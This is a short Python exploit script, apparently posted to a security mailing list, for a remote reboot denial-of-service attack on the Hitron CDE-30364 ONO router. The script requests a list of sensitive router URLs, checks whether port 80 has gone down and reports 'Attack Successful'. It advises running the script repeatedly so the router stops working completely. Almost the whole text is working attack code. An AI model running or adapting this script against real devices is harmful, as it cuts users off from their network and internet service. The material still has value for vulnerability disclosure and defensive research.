|
#!/usr/bin/python
#-----------------------------------------------------------------------------------------
#Description:
#-----------------------------------------------------------------------------------------
#Hitron Technologies CDE-30364 is a famous ONO Router.
#Scanning certain sensitive urls the router is restarted. If you run the
script several times, it stops working.
import httplib
import socket
import time
print
"\n###########################################################################################################"
print "# Exploit Title: Router ONO Hitron CDE-30364 - Remote
reboot #"
print "# Date:
8-10-2013
#"
print "# Exploit Author: Matias Mingorance Svensson -
matias.ms[at]owasp.org
#"
print "# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
#"
print "# Tested on: Hitron Technologies
CDE-30364 #"
print "# Version HW:
1A
#"
print "# Version SW:
3.1.0.8-ONO
#"
print
"###########################################################################################################\n"
host = '192.168.1.1'
#Sensitive urls
directories = ['login.asp', 'config.asp', 'reset.asp', 'css',
'css/webONO.css', 'css/ie7ONO.css', 'css/ie6ONO.css', 'js/',
'js/common.js', 'js/dict.js', 'js/hover.js', 'goform/login',
'goform/ConfigCable', 'admin/cable-Systeminfo.asp']
for directory in directories:
conn = httplib.HTTPConnection(host)
conn.request('GET', '/' + directory)
r1 = conn.getresponse()
print r1.status, r1.reason
conn.close()
#Check 80 port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(4)
try:
s.connect((host, 80))
s.shutdown(2)
print "\n"
print "----------------------------------------------------------\n"
print "Attack Fail!\n"
except:
print "----------------------------------------------------------\n"
print "Attack Successful! The router is rebooting!\n"
print "Run the script several times to stop router completely!\n"
--
Un saludo,
Matías Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms
|